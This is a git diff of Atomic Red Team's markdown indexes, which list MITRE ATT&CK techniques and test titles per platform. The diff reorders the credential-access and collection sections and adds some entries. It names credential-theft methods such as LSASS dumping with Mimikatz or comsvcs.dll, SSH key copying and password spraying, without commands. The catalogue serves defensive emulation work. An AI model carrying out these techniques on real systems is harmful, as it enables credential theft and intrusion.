+- T1588.006 Vulnerabilities [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1583.006 Web Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1584.006 Web Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+
+# reconnaissance
+- T1595 Active Scanning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1591.002 Business Relationships [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1596.004 CDNs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1592.004 Client Configurations [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1589.001 Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1590.002 DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1596.001 DNS/Passive DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1591.001 Determine Physical Locations [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1596.003 Digital Certificates [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1590.001 Domain Properties [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1589.002 Email Addresses [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1589.003 Employee Names [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1592.003 Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1592 Gather Victim Host Information [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1589 Gather Victim Identity Information [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1590 Gather Victim Network Information [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1591 Gather Victim Org Information [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1592.001 Hardware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1590.005 IP Addresses [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1591.003 Identify Business Tempo [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1591.004 Identify Roles [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1590.006 Network Security Appliances [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1590.004 Network Topology [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1590.003 Network Trust Dependencies [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1598 Phishing for Information [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1597.002 Purchase Technical Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1596.005 Scan Databases [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1595.001 Scanning IP Blocks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1597 Search Closed Sources [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1593.002 Search Engines [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1596 Search Open Technical Databases [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1593 Search Open Websites/Domains [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1594 Search Victim-Owned Websites [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1593.001 Social Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1592.002 Software [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1598.002 Spearphishing Attachment [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1598.003 Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1598.001 Spearphishing Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1597.001 Threat Intel Vendors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1595.002 Vulnerability Scanning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1596.002 WHOIS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+
# lateral-movement
- T1550.001 Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1210 Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -434,40 +572,6 @@
- Atomic Test #3: Malicious User Agents - Nix [linux, macos]
- T1102 Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-# collection
-- T1560 Archive Collected Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1560.003 Archive via Custom Method [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1560.002 Archive via Library [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- [T1560.001 Archive via Utility](../../T1560.001/T1560.001.md)
- - Atomic Test #5: Data Compressed - nix - zip [linux, macos]
- - Atomic Test #6: Data Compressed - nix - gzip Single File [linux, macos]
- - Atomic Test #7: Data Compressed - nix - tar Folder or File [linux, macos]
- - Atomic Test #8: Data Encrypted with zip and gpg symmetric [macos, linux]
-- T1123 Audio Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1119 Automated Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1115 Clipboard Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1213.001 Confluence [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1074 Data Staged [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1530 Data from Cloud Storage Object [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1213 Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1005 Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1039 Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1025 Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1114 Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1114.003 Email Forwarding Rule [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1056 Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1056.001 Keylogging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- [T1074.001 Local Data Staging](../../T1074.001/T1074.001.md)
- - Atomic Test #2: Stage data from Discovery.sh [linux, macos]
-- T1557 Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1074.002 Remote Data Staging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1114.002 Remote Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- [T1113 Screen Capture](../../T1113/T1113.md)
- - Atomic Test #3: X Windows Capture [linux]
- - Atomic Test #4: Capture Linux Desktop using Import Tool [linux]
-- T1213.002 Sharepoint [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1056.003 Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-
# execution
- [T1053.001 At (Linux)](../../T1053.001/T1053.001.md)
- Atomic Test #1: At - Schedule a job [linux]
@@ -482,11 +586,13 @@
- T1204.002 Malicious File [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1204.001 Malicious Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1106 Native API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1059.008 Network Device CLI [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1059.006 Python [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1064 Scripting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1072 Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1153 Source [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1053.006 Systemd Timers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1059.004 Unix Shell](../../T1059.004/T1059.004.md)
- Atomic Test #1: Create and Execute Bash Shell Script [macos, linux]
- Atomic Test #2: Command-Line Interface [macos, linux]
@@ -514,6 +620,7 @@
- T1567.002 Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1567.001 Exfiltration to Code Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1029 Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1020.001 Traffic Duplication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1537 Transfer Data to Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
# initial-access
diff --git a/atomics/Indexes/Indexes-Markdown/macos-index.md b/atomics/Indexes/Indexes-Markdown/macos-index.md
index 052b2df9..3adf5fa8 100644
--- a/atomics/Indexes/Indexes-Markdown/macos-index.md
+++ b/atomics/Indexes/Indexes-Markdown/macos-index.md
@@ -113,6 +113,76 @@
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1505.003 Web Shell [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+# credential-access
+- T1557.002 ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1552.003 Bash History](../../T1552.003/T1552.003.md)
+ - Atomic Test #1: Search Through Bash History [linux, macos]
+- T1110 Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1110.004 Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1552.001 Credentials In Files](../../T1552.001/T1552.001.md)
+ - Atomic Test #1: Extract Browser and System credentials with LaZagne [macos]
+ - Atomic Test #2: Extract passwords with grep [macos, linux]
+- T1555 Credentials from Password Stores [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1555.003 Credentials from Web Browsers](../../T1555.003/T1555.003.md)
+ - Atomic Test #2: Search macOS Safari Cookies [macos]
+- T1212 Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1056.002 GUI Input Capture](../../T1056.002/T1056.002.md)
+ - Atomic Test #1: AppleScript - Prompt User for Password [macos]
+- T1056 Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1555.001 Keychain](../../T1555.001/T1555.001.md)
+ - Atomic Test #1: Keychain [macos]
+- T1056.001 Keylogging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1557 Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1040 Network Sniffing](../../T1040/T1040.md)
+ - Atomic Test #2: Packet Capture macOS [macos]
+- T1003 OS Credential Dumping [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1110.002 Password Cracking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1110.001 Password Guessing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1110.003 Password Spraying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1556.003 Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1552.004 Private Keys](../../T1552.004/T1552.004.md)
+ - Atomic Test #2: Discover Private SSH Keys [macos, linux]
+ - Atomic Test #4: Copy Private SSH Keys with rsync [macos, linux]
+- T1555.002 Securityd Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1539 Steal Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1111 Two-Factor Authentication Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1552 Unsecured Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1056.003 Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+
+# collection
+- T1557.002 ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1560 Archive Collected Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1560.003 Archive via Custom Method [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1560.002 Archive via Library [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1560.001 Archive via Utility](../../T1560.001/T1560.001.md)
+ - Atomic Test #5: Data Compressed - nix - zip [linux, macos]
+ - Atomic Test #6: Data Compressed - nix - gzip Single File [linux, macos]
+ - Atomic Test #7: Data Compressed - nix - tar Folder or File [linux, macos]
+ - Atomic Test #8: Data Encrypted with zip and gpg symmetric [macos, linux]
+- T1123 Audio Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1119 Automated Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1115 Clipboard Data](../../T1115/T1115.md)
+ - Atomic Test #3: Execute commands from clipboard [macos]
+- T1074 Data Staged [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1213 Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1005 Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1039 Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1025 Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1056.002 GUI Input Capture](../../T1056.002/T1056.002.md)
+ - Atomic Test #1: AppleScript - Prompt User for Password [macos]
+- T1056 Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1056.001 Keylogging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1074.001 Local Data Staging](../../T1074.001/T1074.001.md)
+ - Atomic Test #2: Stage data from Discovery.sh [linux, macos]
+- T1557 Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1074.002 Remote Data Staging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1113 Screen Capture](../../T1113/T1113.md)
+ - Atomic Test #1: Screencapture [macos]
+ - Atomic Test #2: Screencapture (silent) [macos]
+- T1125 Video Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1056.003 Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+
# defense-evasion
- T1548 Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1027.001 Binary Padding](../../T1027.001/T1027.001.md)
@@ -150,9 +220,6 @@
- T1222 File and Directory Permissions Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1553.001 Gatekeeper Bypass](../../T1553.001/T1553.001.md)
- Atomic Test #1: Gatekeeper Bypass [macos]
-- [T1562.003 HISTCONTROL](../../T1562.003/T1562.003.md)
- - Atomic Test #1: Disable history collection [linux, macos]
- - Atomic Test #2: Mac HISTCONTROL [macos, linux]
- T1564.005 Hidden File System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1564.001 Hidden Files and Directories](../../T1564.001/T1564.001.md)
- Atomic Test #1: Create a hidden file in a hidden directory [linux, macos]
@@ -166,6 +233,9 @@
- T1564.003 Hidden Window [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1564 Hide Artifacts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1562.003 Impair Command History Logging](../../T1562.003/T1562.003.md)
+ - Atomic Test #1: Disable history collection [linux, macos]
+ - Atomic Test #2: Mac HISTCONTROL [macos, linux]
- T1562 Impair Defenses [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1562.006 Indicator Blocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1027.005 Indicator Removal from Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -224,6 +294,7 @@
- Atomic Test #4: Modify file timestamps using reference file [linux, macos]
- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1497.002 User Activity Based Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1564.007 VBA Stomping [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1497 Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -252,6 +323,7 @@
- Atomic Test #1: macOS/Linux - Simulate CPU Load with Yes [macos, linux]
- T1565.003 Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1499.002 Service Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1489 Service Stop [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1565.001 Stored Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1529 System Shutdown/Reboot](../../T1529/T1529.md)
- Atomic Test #3: Restart System via `shutdown` - macOS/Linux [macos, linux]
@@ -397,38 +469,6 @@
- Atomic Test #3: Malicious User Agents - Nix [linux, macos]
- T1102 Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-# collection
-- T1560 Archive Collected Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1560.003 Archive via Custom Method [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1560.002 Archive via Library [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- [T1560.001 Archive via Utility](../../T1560.001/T1560.001.md)
- - Atomic Test #5: Data Compressed - nix - zip [linux, macos]
- - Atomic Test #6: Data Compressed - nix - gzip Single File [linux, macos]
- - Atomic Test #7: Data Compressed - nix - tar Folder or File [linux, macos]
- - Atomic Test #8: Data Encrypted with zip and gpg symmetric [macos, linux]
-- T1123 Audio Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1119 Automated Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- [T1115 Clipboard Data](../../T1115/T1115.md)
- - Atomic Test #3: Execute commands from clipboard [macos]
-- T1074 Data Staged [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1213 Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1005 Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1039 Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1025 Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- [T1056.002 GUI Input Capture](../../T1056.002/T1056.002.md)
- - Atomic Test #1: AppleScript - Prompt User for Password [macos]
-- T1056 Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1056.001 Keylogging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- [T1074.001 Local Data Staging](../../T1074.001/T1074.001.md)
- - Atomic Test #2: Stage data from Discovery.sh [linux, macos]
-- T1557 Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1074.002 Remote Data Staging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- [T1113 Screen Capture](../../T1113/T1113.md)
- - Atomic Test #1: Screencapture [macos]
- - Atomic Test #2: Screencapture (silent) [macos]
-- T1125 Video Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1056.003 Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-
# exfiltration
- T1020 Automated Exfiltration [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1030 Data Transfer Size Limits](../../T1030/T1030.md)
@@ -450,42 +490,6 @@
- T1567.001 Exfiltration to Code Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1029 Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-# credential-access
-- [T1552.003 Bash History](../../T1552.003/T1552.003.md)
- - Atomic Test #1: Search Through Bash History [linux, macos]
-- T1110 Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1110.004 Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- [T1552.001 Credentials In Files](../../T1552.001/T1552.001.md)
- - Atomic Test #1: Extract Browser and System credentials with LaZagne [macos]
- - Atomic Test #2: Extract passwords with grep [macos, linux]
-- T1555 Credentials from Password Stores [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- [T1555.003 Credentials from Web Browsers](../../T1555.003/T1555.003.md)
- - Atomic Test #2: Search macOS Safari Cookies [macos]
-- T1212 Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- [T1056.002 GUI Input Capture](../../T1056.002/T1056.002.md)
- - Atomic Test #1: AppleScript - Prompt User for Password [macos]
-- T1056 Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- [T1555.001 Keychain](../../T1555.001/T1555.001.md)
- - Atomic Test #1: Keychain [macos]
-- T1056.001 Keylogging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1557 Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- [T1040 Network Sniffing](../../T1040/T1040.md)
- - Atomic Test #2: Packet Capture macOS [macos]
-- T1003 OS Credential Dumping [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1110.002 Password Cracking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1110.001 Password Guessing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1110.003 Password Spraying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1556.003 Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- [T1552.004 Private Keys](../../T1552.004/T1552.004.md)
- - Atomic Test #2: Discover Private SSH Keys [macos, linux]
- - Atomic Test #4: Copy Private SSH Keys with rsync [macos, linux]
-- T1555.002 Securityd Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1539 Steal Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1111 Two-Factor Authentication Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1552 Unsecured Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1056.003 Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-
# initial-access
- T1195.003 Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1195.001 Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md
index 526d1b20..576b8e04 100644
--- a/atomics/Indexes/Indexes-Markdown/windows-index.md
+++ b/atomics/Indexes/Indexes-Markdown/windows-index.md
@@ -1,4 +1,140 @@
# Windows Atomic Tests by ATT&CK Tactic & Technique
+# credential-access
+- T1557.002 ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1558.004 AS-REP Roasting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1110 Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1003.005 Cached Domain Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1056.004 Credential API Hooking](../../T1056.004/T1056.004.md)
+ - Atomic Test #1: Hook PowerShell TLS Encrypt/Decrypt Messages [windows]
+- T1110.004 Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1552.001 Credentials In Files](../../T1552.001/T1552.001.md)
+ - Atomic Test #3: Extracting passwords with findstr [windows]
+ - Atomic Test #4: Access unattend.xml [windows]
+- [T1555 Credentials from Password Stores](../../T1555/T1555.md)
+ - Atomic Test #1: Extract Windows Credential Manager via VBA [windows]
+- [T1555.003 Credentials from Web Browsers](../../T1555.003/T1555.003.md)
+ - Atomic Test #1: Run Chrome-password Collector [windows]
+ - Atomic Test #3: LaZagne - Credentials from Browser [windows]
+- [T1552.002 Credentials in Registry](../../T1552.002/T1552.002.md)
+ - Atomic Test #1: Enumeration for Credentials in Registry [windows]
+ - Atomic Test #2: Enumeration for PuTTY Credentials in Registry [windows]
+- T1003.006 DCSync [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1212 Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1187 Forced Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1056.002 GUI Input Capture](../../T1056.002/T1056.002.md)
+ - Atomic Test #2: PowerShell - Prompt User for Password [windows]
+- T1558.001 Golden Ticket [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1552.006 Group Policy Preferences](../../T1552.006/T1552.006.md)
+ - Atomic Test #1: GPP Passwords (findstr) [windows]
+ - Atomic Test #2: GPP Passwords (Get-GPPPassword) [windows]
+- T1056 Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1558.003 Kerberoasting](../../T1558.003/T1558.003.md)
+ - Atomic Test #1: Request for service tickets [windows]
+- [T1056.001 Keylogging](../../T1056.001/T1056.001.md)
+ - Atomic Test #1: Input Capture [windows]
+- T1557.001 LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1003.004 LSA Secrets](../../T1003.004/T1003.004.md)
+ - Atomic Test #1: Dumping LSA Secrets [windows]
+- [T1003.001 LSASS Memory](../../T1003.001/T1003.001.md)
+ - Atomic Test #1: Windows Credential Editor [windows]
+ - Atomic Test #2: Dump LSASS.exe Memory using ProcDump [windows]
+ - Atomic Test #3: Dump LSASS.exe Memory using comsvcs.dll [windows]
+ - Atomic Test #4: Dump LSASS.exe Memory using direct system calls and API unhooking [windows]
+ - Atomic Test #5: Dump LSASS.exe Memory using Windows Task Manager [windows]
+ - Atomic Test #6: Offline Credential Theft With Mimikatz [windows]
+ - Atomic Test #7: LSASS read with pypykatz [windows]
+- T1557 Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1003.003 NTDS](../../T1003.003/T1003.003.md)
+ - Atomic Test #1: Create Volume Shadow Copy with vssadmin [windows]
+ - Atomic Test #2: Copy NTDS.dit from Volume Shadow Copy [windows]
+ - Atomic Test #3: Dump Active Directory Database with NTDSUtil [windows]
+ - Atomic Test #4: Create Volume Shadow Copy with WMI [windows]
+ - Atomic Test #5: Create Volume Shadow Copy with Powershell [windows]
+ - Atomic Test #6: Create Symlink to Volume Shadow Copy [windows]
+- [T1040 Network Sniffing](../../T1040/T1040.md)
+ - Atomic Test #3: Packet Capture Windows Command Prompt [windows]
+ - Atomic Test #4: Windows Internal Packet Capture [windows]
+- [T1003 OS Credential Dumping](../../T1003/T1003.md)
+ - Atomic Test #1: Powershell Mimikatz [windows]
+ - Atomic Test #2: Gsecdump [windows]
+ - Atomic Test #3: Credential Dumping with NPPSpy [windows]
+- [T1110.002 Password Cracking](../../T1110.002/T1110.002.md)
+ - Atomic Test #1: Password Cracking with Hashcat [windows]
+- [T1556.002 Password Filter DLL](../../T1556.002/T1556.002.md)
+ - Atomic Test #1: Install and Register Password Filter DLL [windows]
+- [T1110.001 Password Guessing](../../T1110.001/T1110.001.md)
+ - Atomic Test #1: Brute Force Credentials [windows]
+- [T1110.003 Password Spraying](../../T1110.003/T1110.003.md)
+ - Atomic Test #1: Password Spray all Domain Users [windows]
+ - Atomic Test #2: Password Spray (DomainPasswordSpray) [windows]
+- [T1552.004 Private Keys](../../T1552.004/T1552.004.md)
+ - Atomic Test #1: Private Keys [windows]
+- [T1003.002 Security Account Manager](../../T1003.002/T1003.002.md)
+ - Atomic Test #1: Registry dump of SAM, creds, and secrets [windows]
+ - Atomic Test #2: Registry parse with pypykatz [windows]
+ - Atomic Test #3: esentutl.exe SAM copy [windows]
+ - Atomic Test #4: PowerDump Registry dump of SAM for hashes and usernames [windows]
+- T1558.002 Silver Ticket [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1539 Steal Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1558 Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1111 Two-Factor Authentication Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1552 Unsecured Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1056.003 Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+
+# collection
+- T1557.002 ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1560 Archive Collected Data](../../T1560/T1560.md)
+ - Atomic Test #1: Compress Data for Exfiltration With PowerShell [windows]
+- T1560.003 Archive via Custom Method [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- T1560.002 Archive via Library [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1560.001 Archive via Utility](../../T1560.001/T1560.001.md)
+ - Atomic Test #1: Compress Data for Exfiltration With Rar [windows]
+ - Atomic Test #2: Compress Data and lock with password for Exfiltration with winrar [windows]
+ - Atomic Test #3: Compress Data and lock with password for Exfiltration with winzip [windows]
